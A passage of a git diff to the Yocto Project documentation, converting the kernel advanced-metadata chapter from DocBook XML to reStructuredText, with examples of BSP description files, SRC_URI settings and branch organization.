+ kernel type using a ``define`` :term:`KTYPE` ``myktype`` line. See the
+ ":ref:`kernel-dev/kernel-dev-advanced:bsp descriptions`" section for more
+ information.
+
+BSP Descriptions
+----------------
+
+BSP descriptions (i.e. ``*.scc`` files) combine kernel types with
+hardware-specific features. The hardware-specific Metadata is typically
+defined independently in the BSP layer, and then aggregated with each
+supported kernel type.
+
+.. note::
+
+ For BSPs supported by the Yocto Project, the BSP description files
+ are located in the ``bsp`` directory of the ``yocto-kernel-cache``
+ repository organized under the "Yocto Linux Kernel" heading in the
+ :yocto_git:`Yocto Project Source Repositories </>`.
+
+This section overviews the BSP description structure, the aggregation
+concepts, and presents a detailed example using a BSP supported by the
+Yocto Project (i.e. BeagleBone Board). For complete information on BSP
+layer file hierarchy, see the :doc:`../bsp-guide/bsp-guide`.
+
+.. _bsp-description-file-overview:
+
+Description Overview
+~~~~~~~~~~~~~~~~~~~~
+
+For simplicity, consider the following root BSP layer description files
+for the BeagleBone board. These files employ both a structure and naming
+convention for consistency. The naming convention for the file is as
+follows:
+::
+
+ bsp_root_name-kernel_type.scc
+
+Here are some example root layer
+BSP filenames for the BeagleBone Board BSP, which is supported by the
+Yocto Project:
+::
+
+ beaglebone-standard.scc
+ beaglebone-preempt-rt.scc
+
+Each file uses the root name (i.e "beaglebone") BSP name followed by the
+kernel type.
+
+Examine the ``beaglebone-standard.scc`` file:
+::
+
+ define KMACHINE beaglebone
+ define KTYPE standard
+ define KARCH arm
+
+ include ktypes/standard/standard.scc
+ branch beaglebone
+
+ include beaglebone.scc
+
+ # default policy for standard kernels
+ include features/latencytop/latencytop.scc
+ include features/profiling/profiling.scc
+
+Every top-level BSP description file
+should define the :term:`KMACHINE`,
+:term:`KTYPE`, and
+:term:`KARCH` variables. These
+variables allow the OpenEmbedded build system to identify the
+description as meeting the criteria set by the recipe being built. This
+example supports the "beaglebone" machine for the "standard" kernel and
+the "arm" architecture.
+
+Be aware that a hard link between the ``KTYPE`` variable and a kernel
+type description file does not exist. Thus, if you do not have the
+kernel type defined in your kernel Metadata as it is here, you only need
+to ensure that the
+:term:`LINUX_KERNEL_TYPE`
+variable in the kernel recipe and the ``KTYPE`` variable in the BSP
+description file match.
+
+To separate your kernel policy from your hardware configuration, you
+include a kernel type (``ktype``), such as "standard". In the previous
+example, this is done using the following:
+::
+
+ include ktypes/standard/standard.scc
+
+This file aggregates all the configuration
+fragments, patches, and features that make up your standard kernel
+policy. See the "`Kernel Types <#kernel-types>`__" section for more
+information.
+
+To aggregate common configurations and features specific to the kernel
+for `mybsp`, use the following:
+::
+
+ include mybsp.scc
+
+You can see that in the BeagleBone example with the following:
+::
+
+ include beaglebone.scc
+
+For information on how to break a complete ``.config`` file into the various
+configuration fragments, see the ":ref:`creating-config-fragments`" section.
+
+Finally, if you have any configurations specific to the hardware that
+are not in a ``*.scc`` file, you can include them as follows:
+::
+
+ kconf hardware mybsp-extra.cfg
+
+The BeagleBone example does not include these
+types of configurations. However, the Malta 32-bit board does
+("mti-malta32"). Here is the ``mti-malta32-le-standard.scc`` file:
+::
+
+ define KMACHINE mti-malta32-le
+ define KMACHINE qemumipsel
+ define KTYPE standard
+ define KARCH mips
+
+ include ktypes/standard/standard.scc
+ branch mti-malta32
+
+ include mti-malta32.scc
+ kconf hardware mti-malta32-le.cfg
+
+.. _bsp-description-file-example-minnow:
+
+Example
+~~~~~~~
+
+Many real-world examples are more complex. Like any other ``.scc`` file,
+BSP descriptions can aggregate features. Consider the Minnow BSP
+definition given the ``linux-yocto-4.4`` branch of the
+``yocto-kernel-cache`` (i.e.
+``yocto-kernel-cache/bsp/minnow/minnow.scc``):
+
+.. note::
+
+ Although the Minnow Board BSP is unused, the Metadata remains and is
+ being used here just as an example.
+
+::
+
+ include cfg/x86.scc
+ include features/eg20t/eg20t.scc
+ include cfg/dmaengine.scc
+ include features/power/intel.scc
+ include cfg/efi.scc
+ include features/usb/ehci-hcd.scc
+ include features/usb/ohci-hcd.scc
+ include features/usb/usb-gadgets.scc
+ include features/usb/touchscreen-composite.scc
+ include cfg/timer/hpet.scc
+ include features/leds/leds.scc
+ include features/spi/spidev.scc
+ include features/i2c/i2cdev.scc
+ include features/mei/mei-txe.scc
+
+ # Earlyprintk and port debug requires 8250
+ kconf hardware cfg/8250.cfg
+
+ kconf hardware minnow.cfg
+ kconf hardware minnow-dev.cfg
+
+The ``minnow.scc`` description file includes a hardware configuration
+fragment (``minnow.cfg``) specific to the Minnow BSP as well as several
+more general configuration fragments and features enabling hardware
+found on the machine. This ``minnow.scc`` description file is then
+included in each of the three "minnow" description files for the
+supported kernel types (i.e. "standard", "preempt-rt", and "tiny").
+Consider the "minnow" description for the "standard" kernel type (i.e.
+``minnow-standard.scc``):
+::
+
+ define KMACHINE minnow
+ define KTYPE standard
+ define KARCH i386
+
+ include ktypes/standard
+
+ include minnow.scc
+
+ # Extra minnow configs above the minimal defined in minnow.scc
+ include cfg/efi-ext.scc
+ include features/media/media-all.scc
+ include features/sound/snd_hda_intel.scc
+
+ # The following should really be in standard.scc
+ # USB live-image support
+ include cfg/usb-mass-storage.scc
+ include cfg/boot-live.scc
+
+ # Basic profiling
+ include features/latencytop/latencytop.scc
+ include features/profiling/profiling.scc
+
+ # Requested drivers that don't have an existing scc
+ kconf hardware minnow-drivers-extra.cfg
+
+The ``include`` command midway through the file includes the ``minnow.scc`` description
+that defines all enabled hardware for the BSP that is common to all
+kernel types. Using this command significantly reduces duplication.
+
+Now consider the "minnow" description for the "tiny" kernel type (i.e.
+``minnow-tiny.scc``):
+::
+
+ define KMACHINE minnow
+ define KTYPE tiny
+ define KARCH i386
+
+ include ktypes/tiny
+
+ include minnow.scc
+
+As you might expect,
+the "tiny" description includes quite a bit less. In fact, it includes
+only the minimal policy defined by the "tiny" kernel type and the
+hardware-specific configuration required for booting the machine along
+with the most basic functionality of the system as defined in the base
+"minnow" description file.
+
+Notice again the three critical variables:
+:term:`KMACHINE`,
+:term:`KTYPE`, and
+:term:`KARCH`. Of these variables, only
+``KTYPE`` has changed to specify the "tiny" kernel type.
+
+Kernel Metadata Location
+========================
+
+Kernel Metadata always exists outside of the kernel tree either defined
+in a kernel recipe (recipe-space) or outside of the recipe. Where you
+choose to define the Metadata depends on what you want to do and how you
+intend to work. Regardless of where you define the kernel Metadata, the
+syntax used applies equally.
+
+If you are unfamiliar with the Linux kernel and only wish to apply a
+configuration and possibly a couple of patches provided to you by
+others, the recipe-space method is recommended. This method is also a
+good approach if you are working with Linux kernel sources you do not
+control or if you just do not want to maintain a Linux kernel Git
+repository on your own. For partial information on how you can define
+kernel Metadata in the recipe-space, see the
+":ref:`kernel-dev/kernel-dev-common:modifying an existing recipe`" section.
+
+Conversely, if you are actively developing a kernel and are already
+maintaining a Linux kernel Git repository of your own, you might find it
+more convenient to work with kernel Metadata kept outside the
+recipe-space. Working with Metadata in this area can make iterative
+development of the Linux kernel more efficient outside of the BitBake
+environment.
+
+Recipe-Space Metadata
+---------------------
+
+When stored in recipe-space, the kernel Metadata files reside in a
+directory hierarchy below
+:term:`FILESEXTRAPATHS`. For
+a linux-yocto recipe or for a Linux kernel recipe derived by copying and
+modifying
+``oe-core/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb`` to
+a recipe in your layer, ``FILESEXTRAPATHS`` is typically set to
+``${``\ :term:`THISDIR`\ ``}/${``\ :term:`PN`\ ``}``.
+See the ":ref:`kernel-dev/kernel-dev-common:modifying an existing recipe`"
+section for more information.
+
+Here is an example that shows a trivial tree of kernel Metadata stored
+in recipe-space within a BSP layer:
+::
+
+ meta-my_bsp_layer/
+ `-- recipes-kernel
+ `-- linux
+ `-- linux-yocto
+ |-- bsp-standard.scc
+ |-- bsp.cfg
+ `-- standard.cfg
+
+When the Metadata is stored in recipe-space, you must take steps to
+ensure BitBake has the necessary information to decide what files to
+fetch and when they need to be fetched again. It is only necessary to
+specify the ``.scc`` files on the
+:term:`SRC_URI`. BitBake parses them
+and fetches any files referenced in the ``.scc`` files by the
+``include``, ``patch``, or ``kconf`` commands. Because of this, it is
+necessary to bump the recipe :term:`PR`
+value when changing the content of files not explicitly listed in the
+``SRC_URI``.
+
+If the BSP description is in recipe space, you cannot simply list the
+``*.scc`` in the ``SRC_URI`` statement. You need to use the following
+form from your kernel append file:
+::
+
+ SRC_URI_append_myplatform = " \
+ file://myplatform;type=kmeta;destsuffix=myplatform \
+ "
+
+Metadata Outside the Recipe-Space
+---------------------------------
+
+When stored outside of the recipe-space, the kernel Metadata files
+reside in a separate repository. The OpenEmbedded build system adds the
+Metadata to the build as a "type=kmeta" repository through the
+:term:`SRC_URI` variable. As an
+example, consider the following ``SRC_URI`` statement from the
+``linux-yocto_4.12.bb`` kernel recipe:
+::
+
+ SRC_URI = "git://git.yoctoproject.org/linux-yocto-4.12.git;name=machine;branch=${KBRANCH}; \
+ git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-4.12;destsuffix=${KMETA}"
+
+
+``${KMETA}``, in this context, is simply used to name the directory into
+which the Git fetcher places the Metadata. This behavior is no different
+than any multi-repository ``SRC_URI`` statement used in a recipe (e.g.
+see the previous section).
+
+You can keep kernel Metadata in a "kernel-cache", which is a directory
+containing configuration fragments. As with any Metadata kept outside
+the recipe-space, you simply need to use the ``SRC_URI`` statement with
+the "type=kmeta" attribute. Doing so makes the kernel Metadata available
+during the configuration phase.
+
+If you modify the Metadata, you must not forget to update the ``SRCREV``
+statements in the kernel's recipe. In particular, you need to update the
+``SRCREV_meta`` variable to match the commit in the ``KMETA`` branch you
+wish to use. Changing the data in these branches and not updating the
+``SRCREV`` statements to match will cause the build to fetch an older
+commit.
+
+Organizing Your Source
+======================
+
+Many recipes based on the ``linux-yocto-custom.bb`` recipe use Linux
+kernel sources that have only a single branch - "master". This type of
+repository structure is fine for linear development supporting a single
+machine and architecture. However, if you work with multiple boards and
+architectures, a kernel source repository with multiple branches is more
+efficient. For example, suppose you need a series of patches for one
+board to boot. Sometimes, these patches are works-in-progress or
+fundamentally wrong, yet they are still necessary for specific boards.
+In these situations, you most likely do not want to include these
+patches in every kernel you build (i.e. have the patches as part of the
+lone "master" branch). It is situations like these that give rise to
+multiple branches used within a Linux kernel sources Git repository.
+
+Repository organization strategies exist that maximize source reuse,
+remove redundancy, and logically order your changes. This section
+presents strategies for the following cases:
+
+- Encapsulating patches in a feature description and only including the
+ patches in the BSP descriptions of the applicable boards.
+
+- Creating a machine branch in your kernel source repository and
+ applying the patches on that branch only.
+
+- Creating a feature branch in your kernel source repository and
+ merging that branch into your BSP when needed.
+
+The approach you take is entirely up to you and depends on what works
+best for your development model.
+
+Encapsulating Patches
+---------------------
+
+If you are reusing patches from an external tree and are not working on
+the patches, you might find the encapsulated feature to be appropriate.
+Given this scenario, you do not need to create any branches in the
+source repository. Rather, you just take the static patches you need and
+encapsulate them within a feature description. Once you have the feature
+description, you simply include that into the BSP description as
+described in the "`BSP Descriptions <#bsp-descriptions>`__" section.
+
+You can find information on how to create patches and BSP descriptions
+in the "`Patches <#patches>`__" and "`BSP
+Descriptions <#bsp-descriptions>`__" sections.
+
+Machine Branches
+----------------
+
+When you have multiple machines and architectures to support, or you are
+actively working on board support, it is more efficient to create
+branches in the repository based on individual machines. Having machine
+branches allows common source to remain in the "master" branch with any
+features specific to a machine stored in the appropriate machine branch.
+This organization method frees you from continually reintegrating your
+patches into a feature.
+
+Once you have a new branch, you can set up your kernel Metadata to use
+the branch a couple different ways. In the recipe, you can specify the
+new branch as the ``KBRANCH`` to use for the board as follows:
+::
+
+ KBRANCH = "mynewbranch"
+
+Another method is to use the ``branch`` command in the BSP
+description:
+::
+
+ mybsp.scc:
+ define KMACHINE mybsp
+ define KTYPE standard
+ define KARCH i386
+ include standard.scc
+
+ branch mynewbranch
+
+ include mybsp-hw.scc
+
+If you find yourself with numerous branches, you might consider using a
+hierarchical branching system similar to what the Yocto Linux Kernel Git
+repositories use:
+::
+
+ common/kernel_type/machine
+
+If you had two kernel types, "standard" and "small" for instance, three
+machines, and common as ``mydir``, the branches in your Git repository
+might look like this:
+::
+
+ mydir/base
+ mydir/standard/base
+ mydir/standard/machine_a
+ mydir/standard/machine_b
+ mydir/standard/machine_c
+ mydir/small/base
+ mydir/small/machine_a
+
+This organization can help clarify the branch relationships. In this
+case, ``mydir/standard/machine_a`` includes everything in ``mydir/base``
+and ``mydir/standard/base``. The "standard" and "small" branches add
+sources specific to those kernel types that for whatever reason are not
+appropriate for the other branches.
+
+.. note::
+
+ The "base" branches are an artifact of the way Git manages its data
+ internally on the filesystem: Git will not allow you to use
+ ``mydir/standard`` and ``mydir/standard/machine_a`` because it would have to
+ create a file and a directory named "standard".
+
+Feature Branches
+----------------
+
+When you are actively developing new features, it can be more efficient
+to work with that feature as a branch, rather than as a set of patches
+that have to be regularly updated. The Yocto Project Linux kernel tools
+provide for this with the ``git merge`` command.
+
+To merge a feature branch into a BSP, insert the ``git merge`` command
+after any ``branch`` commands:
+::
+
+ mybsp.scc:
+ define KMACHINE mybsp
+ define KTYPE standard
+ define KARCH i386
+ include standard.scc
+
+ branch mynewbranch
+ git merge myfeature
+
+ include mybsp-hw.scc
+
+.. _scc-reference:
+
+SCC Description File Reference
+==============================
+
+This section provides a brief reference for the commands you can use
+within an SCC description file (``.scc``):
+
+- ``branch [ref]``: Creates a new branch relative to the current branch
+ (typically ``${KTYPE}``) using the currently checked-out branch, or
+ "ref" if specified.
+
+- ``define``: Defines variables, such as
+ :term:`KMACHINE`,
+ :term:`KTYPE`,
+ :term:`KARCH`, and
+ :term:`KFEATURE_DESCRIPTION`.
+
+- ``include SCC_FILE``: Includes an SCC file in the current file. The
+ file is parsed as if you had inserted it inline.
+
+- ``kconf [hardware|non-hardware] CFG_FILE``: Queues a configuration
+ fragment for merging into the final Linux ``.config`` file.
+
+- ``git merge GIT_BRANCH``: Merges the feature branch into the current
+ branch.
+
+- ``patch PATCH_FILE``: Applies the patch to the current Git branch.
+
+
diff --git a/documentation/kernel-dev/kernel-dev-advanced.xml b/documentation/kernel-dev/kernel-dev-advanced.xml
deleted file mode 100644
index 5c76ed2391..0000000000
--- a/documentation/kernel-dev/kernel-dev-advanced.xml
+++ /dev/null
@@ -1,1256 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='kernel-dev-advanced'>
-<title>Working with Advanced Metadata (<filename>yocto-kernel-cache</filename>)</title>
-
-<section id='kernel-dev-advanced-overview'>
- <title>Overview</title>
-
- <para>
- In addition to supporting configuration fragments and patches, the
- Yocto Project kernel tools also support rich
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink> that you can
- use to define complex policies and Board Support Package (BSP) support.
- The purpose of the Metadata and the tools that manage it is
- to help you manage the complexity of the configuration and sources
- used to support multiple BSPs and Linux kernel types.
- </para>
-
- <para>
- Kernel Metadata exists in many places.
- One area in the Yocto Project
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
- is the <filename>yocto-kernel-cache</filename> Git repository.
- You can find this repository grouped under the "Yocto Linux Kernel"
- heading in the
- <ulink url='&YOCTO_GIT_URL;'>Yocto Project Source Repositories</ulink>.
- </para>
-
- <para>
- Kernel development tools ("kern-tools") exist also in the Yocto
- Project Source Repositories under the "Yocto Linux Kernel" heading
- in the <filename>yocto-kernel-tools</filename> Git repository.
- The recipe that builds these tools is
- <filename>meta/recipes-kernel/kern-tools/kern-tools-native_git.bb</filename>
- in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. <filename>poky</filename>).
- </para>
-</section>
-
-<section id='using-kernel-metadata-in-a-recipe'>
- <title>Using Kernel Metadata in a Recipe</title>
-
- <para>
- As mentioned in the introduction, the Yocto Project contains kernel
- Metadata, which is located in the
- <filename>yocto-kernel-cache</filename> Git repository.
- This Metadata defines Board Support Packages (BSPs) that
- correspond to definitions in linux-yocto recipes for corresponding BSPs.
- A BSP consists of an aggregation of kernel policy and enabled
- hardware-specific features.
- The BSP can be influenced from within the linux-yocto recipe.
- <note>
- A Linux kernel recipe that contains kernel Metadata (e.g.
- inherits from the <filename>linux-yocto.inc</filename> file)
- is said to be a "linux-yocto style" recipe.
- </note>
- </para>
-
- <para>
- Every linux-yocto style recipe must define the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>
- variable.
- This variable is typically set to the same value as the
- <filename>MACHINE</filename> variable, which is used by
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>.
- However, in some cases, the variable might instead refer to the
- underlying platform of the <filename>MACHINE</filename>.
- </para>
-
- <para>
- Multiple BSPs can reuse the same <filename>KMACHINE</filename>
- name if they are built using the same BSP description.
- Multiple Corei7-based BSPs could share the same "intel-corei7-64"
- value for <filename>KMACHINE</filename>.
- It is important to realize that <filename>KMACHINE</filename> is
- just for kernel mapping, while <filename>MACHINE</filename>
- is the machine type within a BSP Layer.
- Even with this distinction, however, these two variables can hold
- the same value.
- See the <link linkend='bsp-descriptions'>BSP Descriptions</link>
- section for more information.
- </para>
-
- <para>
- Every linux-yocto style recipe must also indicate the Linux kernel
- source repository branch used to build the Linux kernel.
- The <ulink url='&YOCTO_DOCS_REF_URL;#var-KBRANCH'><filename>KBRANCH</filename></ulink>
- variable must be set to indicate the branch.
- <note>
- You can use the <filename>KBRANCH</filename> value to define an
- alternate branch typically with a machine override as shown here
- from the <filename>meta-yocto-bsp</filename> layer:
- <literallayout class='monospaced'>
- KBRANCH_edgerouter = "standard/edgerouter"
- </literallayout>
- </note>
- </para>
-
- <para>
- The linux-yocto style recipes can optionally define the following
- variables:
- <literallayout class='monospaced'>
- KERNEL_FEATURES
- LINUX_KERNEL_TYPE
- </literallayout>
- </para>
-
- <para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_KERNEL_TYPE'><filename>LINUX_KERNEL_TYPE</filename></ulink>
- defines the kernel type to be
- used in assembling the configuration.
- If you do not specify a <filename>LINUX_KERNEL_TYPE</filename>,
- it defaults to "standard".
- Together with <filename>KMACHINE</filename>,
- <filename>LINUX_KERNEL_TYPE</filename> defines the search
- arguments used by the kernel tools to find the
- appropriate description within the kernel Metadata with which to
- build out the sources and configuration.
- The linux-yocto recipes define "standard", "tiny", and "preempt-rt"
- kernel types.
- See the "<link linkend='kernel-types'>Kernel Types</link>" section
- for more information on kernel types.
- </para>
-
- <para>
- During the build, the kern-tools search for the BSP description
- file that most closely matches the <filename>KMACHINE</filename>
- and <filename>LINUX_KERNEL_TYPE</filename> variables passed in from the
- recipe.
- The tools use the first BSP description it finds that match
- both variables.
- If the tools cannot find a match, they issue a warning.
- </para>
-
- <para>
- The tools first search for the <filename>KMACHINE</filename> and
- then for the <filename>LINUX_KERNEL_TYPE</filename>.
- If the tools cannot find a partial match, they will use the
- sources from the <filename>KBRANCH</filename> and any configuration
- specified in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>.
- </para>
-
- <para>
- You can use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_FEATURES'><filename>KERNEL_FEATURES</filename></ulink>
- variable
- to include features (configuration fragments, patches, or both) that
- are not already included by the <filename>KMACHINE</filename> and
- <filename>LINUX_KERNEL_TYPE</filename> variable combination.
- For example, to include a feature specified as
- "features/netfilter/netfilter.scc",
- specify:
- <literallayout class='monospaced'>
- KERNEL_FEATURES += "features/netfilter/netfilter.scc"
- </literallayout>
- To include a feature called "cfg/sound.scc" just for the
- <filename>qemux86</filename> machine, specify:
- <literallayout class='monospaced'>
- KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc"
- </literallayout>
- The value of the entries in <filename>KERNEL_FEATURES</filename>
- are dependent on their location within the kernel Metadata itself.
- The examples here are taken from the
- <filename>yocto-kernel-cache</filename> repository.
- Each branch of this repository contains "features" and "cfg"
- subdirectories at the top-level.
- For more information, see the
- "<link linkend='kernel-metadata-syntax'>Kernel Metadata Syntax</link>"
- section.
- </para>
-</section>
-
-<section id='kernel-metadata-syntax'>
- <title>Kernel Metadata Syntax</title>
-
- <para>
- The kernel Metadata consists of three primary types of files:
- <filename>scc</filename>
- <footnote>
- <para>
- <filename>scc</filename> stands for Series Configuration
- Control, but the naming has less significance in the
- current implementation of the tooling than it had in the
- past.
- Consider <filename>scc</filename> files to be description files.
- </para>
- </footnote>
- description files, configuration fragments, and patches.
- The <filename>scc</filename> files define variables and include or
- otherwise reference any of the three file types.
- The description files are used to aggregate all types of kernel
- Metadata into
- what ultimately describes the sources and the configuration required
- to build a Linux kernel tailored to a specific machine.
- </para>
-
- <para>
- The <filename>scc</filename> description files are used to define two
- fundamental types of kernel Metadata:
- <itemizedlist>
- <listitem><para>Features</para></listitem>
- <listitem><para>Board Support Packages (BSPs)</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Features aggregate sources in the form of patches and configuration
- fragments into a modular reusable unit.
- You can use features to implement conceptually separate kernel
- Metadata descriptions such as pure configuration fragments,
- simple patches, complex features, and kernel types.
- <link linkend='kernel-types'>Kernel types</link> define general
- kernel features and policy to be reused in the BSPs.
- </para>
-
- <para>
- BSPs define hardware-specific features and aggregate them with kernel
- types to form the final description of what will be assembled and built.
- </para>
-
- <para>
- While the kernel Metadata syntax does not enforce any logical
- separation of configuration fragments, patches, features or kernel
- types, best practices dictate a logical separation of these types
- of Metadata.
- The following Metadata file hierarchy is recommended:
- <literallayout class='monospaced'>
- <replaceable>base</replaceable>/
- bsp/
- cfg/
- features/
- ktypes/
- patches/
- </literallayout>
- </para>
-
- <para>
- The <filename>bsp</filename> directory contains the
- <link linkend='bsp-descriptions'>BSP descriptions</link>.
- The remaining directories all contain "features".
- Separating <filename>bsp</filename> from the rest of the structure
- aids conceptualizing intended usage.
- </para>
-
- <para>
- Use these guidelines to help place your <filename>scc</filename>
- description files within the structure:
- <itemizedlist>
- <listitem><para>If your file contains
- only configuration fragments, place the file in the
- <filename>cfg</filename> directory.</para></listitem>
- <listitem><para>If your file contains
- only source-code fixes, place the file in the
- <filename>patches</filename> directory.</para></listitem>
- <listitem><para>If your file encapsulates
- a major feature, often combining sources and configurations,
- place the file in <filename>features</filename> directory.
- </para></listitem>
- <listitem><para>If your file aggregates
- non-hardware configuration and patches in order to define a
- base kernel policy or major kernel type to be reused across
- multiple BSPs, place the file in <filename>ktypes</filename>
- directory.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- These distinctions can easily become blurred - especially as
- out-of-tree features slowly merge upstream over time.
- Also, remember that how the description files are placed is
- a purely logical organization and has no impact on the functionality
- of the kernel Metadata.
- There is no impact because all of <filename>cfg</filename>,
- <filename>features</filename>, <filename>patches</filename>, and
- <filename>ktypes</filename>, contain "features" as far as the kernel
- tools are concerned.
- </para>
-
- <para>
- Paths used in kernel Metadata files are relative to
- <replaceable>base</replaceable>, which is either
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- if you are creating Metadata in
- <link linkend='recipe-space-metadata'>recipe-space</link>,
- or the top level of
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/yocto-kernel-cache/tree/'><filename>yocto-kernel-cache</filename></ulink>
- if you are creating
- <link linkend='metadata-outside-the-recipe-space'>Metadata outside of the recipe-space</link>.
- </para>
-
- <section id='configuration'>
- <title>Configuration</title>
-
- <para>
- The simplest unit of kernel Metadata is the configuration-only
- feature.
- This feature consists of one or more Linux kernel configuration
- parameters in a configuration fragment file
- (<filename>.cfg</filename>) and a <filename>.scc</filename> file
- that describes the fragment.
- </para>
-
- <para>
- As an example, consider the Symmetric Multi-Processing (SMP)
- fragment used with the <filename>linux-yocto-4.12</filename>
- kernel as defined outside of the recipe space (i.e.
- <filename>yocto-kernel-cache</filename>).
- This Metadata consists of two files: <filename>smp.scc</filename>
- and <filename>smp.cfg</filename>.
- You can find these files in the <filename>cfg</filename> directory
- of the <filename>yocto-4.12</filename> branch in the
- <filename>yocto-kernel-cache</filename> Git repository:
- <literallayout class='monospaced'>
- cfg/smp.scc:
- define KFEATURE_DESCRIPTION "Enable SMP for 32 bit builds"
- define KFEATURE_COMPATIBILITY all
-
- kconf hardware smp.cfg
-
- cfg/smp.cfg:
- CONFIG_SMP=y
- CONFIG_SCHED_SMT=y
- # Increase default NR_CPUS from 8 to 64 so that platform with
- # more than 8 processors can be all activated at boot time
- CONFIG_NR_CPUS=64
- # The following is needed when setting NR_CPUS to something
- # greater than 8 on x86 architectures, it should be automatically
- # disregarded by Kconfig when using a different arch
- CONFIG_X86_BIGSMP=y
- </literallayout>
- You can find general information on configuration fragment files in
- the
- "<link linkend='creating-config-fragments'>Creating Configuration Fragments</link>"
- section.
- </para>
-
- <para>
- Within the <filename>smp.scc</filename> file, the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KFEATURE_DESCRIPTION'><filename>KFEATURE_DESCRIPTION</filename></ulink>
- statement provides a short description of the fragment.
- Higher level kernel tools use this description.
- </para>
-
- <para>
- Also within the <filename>smp.scc</filename> file, the
- <filename>kconf</filename> command includes the
- actual configuration fragment in an <filename>.scc</filename>
- file, and the "hardware" keyword identifies the fragment as
- being hardware enabling, as opposed to general policy,
- which would use the "non-hardware" keyword.
- The distinction is made for the benefit of the configuration
- validation tools, which warn you if a hardware fragment
- overrides a policy set by a non-hardware fragment.
- <note>
- The description file can include multiple
- <filename>kconf</filename> statements, one per fragment.
- </note>
- </para>
-
- <para>
- As described in the
- "<link linkend='validating-configuration'>Validating Configuration</link>"
- section, you can use the following BitBake command to audit your
- configuration:
- <literallayout class='monospaced'>
- $ bitbake linux-yocto -c kernel_configcheck -f
- </literallayout>
- </para>
- </section>
-
- <section id='patches'>
- <title>Patches</title>
-
- <para>
- Patch descriptions are very similar to configuration fragment
- descriptions, which are described in the previous section.
- However, instead of a <filename>.cfg</filename> file, these
- descriptions work with source patches (i.e.
- <filename>.patch</filename> files).
- </para>
-
- <para>
- A typical patch includes a description file and the patch itself.
- As an example, consider the build patches used with the
- <filename>linux-yocto-4.12</filename> kernel as defined outside of
- the recipe space (i.e. <filename>yocto-kernel-cache</filename>).
- This Metadata consists of several files:
- <filename>build.scc</filename> and a set of
- <filename>*.patch</filename> files.
- You can find these files in the <filename>patches/build</filename>
- directory of the <filename>yocto-4.12</filename> branch in the
- <filename>yocto-kernel-cache</filename> Git repository.
- </para>
-
- <para>
- The following listings show the <filename>build.scc</filename>
- file and part of the
- <filename>modpost-mask-trivial-warnings.patch</filename> file:
- <literallayout class='monospaced'>
- patches/build/build.scc:
- patch arm-serialize-build-targets.patch
- patch powerpc-serialize-image-targets.patch
- patch kbuild-exclude-meta-directory-from-distclean-processi.patch
-
- # applied by kgit
- # patch kbuild-add-meta-files-to-the-ignore-li.patch
-
- patch modpost-mask-trivial-warnings.patch
- patch menuconfig-check-lxdiaglog.sh-Allow-specification-of.patch
-
- patches/build/modpost-mask-trivial-warnings.patch:
- From bd48931bc142bdd104668f3a062a1f22600aae61 Mon Sep 17 00:00:00 2001
- From: Paul Gortmaker &lt;paul.gortmaker@windriver.com&gt;
- Date: Sun, 25 Jan 2009 17:58:09 -0500
- Subject: [PATCH] modpost: mask trivial warnings
-
- Newer HOSTCC will complain about various stdio fcns because
- .
- .
- .
- char *dump_write = NULL, *files_source = NULL;
- int opt;
- --
- 2.10.1
-
- generated by cgit v0.10.2 at 2017-09-28 15:23:23 (GMT)
- </literallayout>
- The description file can include multiple patch statements where
- each statement handles a single patch.
- In the example <filename>build.scc</filename> file, five patch
- statements exist for the five patches in the directory.
- </para>
-
- <para>
- You can create a typical <filename>.patch</filename> file using
- <filename>diff -Nurp</filename> or
- <filename>git format-patch</filename> commands.
- For information on how to create patches, see the
- "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
- and
- "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
- sections.
- </para>
- </section>
-
- <section id='features'>
- <title>Features</title>
-
- <para>
- Features are complex kernel Metadata types that consist
- of configuration fragments, patches, and possibly other feature
- description files.
- As an example, consider the following generic listing:
- <literallayout class='monospaced'>
- features/<replaceable>myfeature</replaceable>.scc
- define KFEATURE_DESCRIPTION "Enable <replaceable>myfeature</replaceable>"
-
- patch 0001-<replaceable>myfeature</replaceable>-core.patch
- patch 0002-<replaceable>myfeature</replaceable>-interface.patch
-
- include cfg/<replaceable>myfeature</replaceable>_dependency.scc
- kconf non-hardware <replaceable>myfeature</replaceable>.cfg
- </literallayout>
- This example shows how the <filename>patch</filename> and
- <filename>kconf</filename> commands are used as well as
- how an additional feature description file is included with
- the <filename>include</filename> command.
- </para>
-
- <para>
- Typically, features are less granular than configuration
- fragments and are more likely than configuration fragments
- and patches to be the types of things you want to specify
- in the <filename>KERNEL_FEATURES</filename> variable of the
- Linux kernel recipe.
- See the "<link linkend='using-kernel-metadata-in-a-recipe'>Using Kernel Metadata in a Recipe</link>"
- section earlier in the manual.
- </para>
- </section>
-
- <section id='kernel-types'>
- <title>Kernel Types</title>
-
- <para>
- A kernel type defines a high-level kernel policy by
- aggregating non-hardware configuration fragments with
- patches you want to use when building a Linux kernel of a
- specific type (e.g. a real-time kernel).
- Syntactically, kernel types are no different than features
- as described in the "<link linkend='features'>Features</link>"
- section.
- The
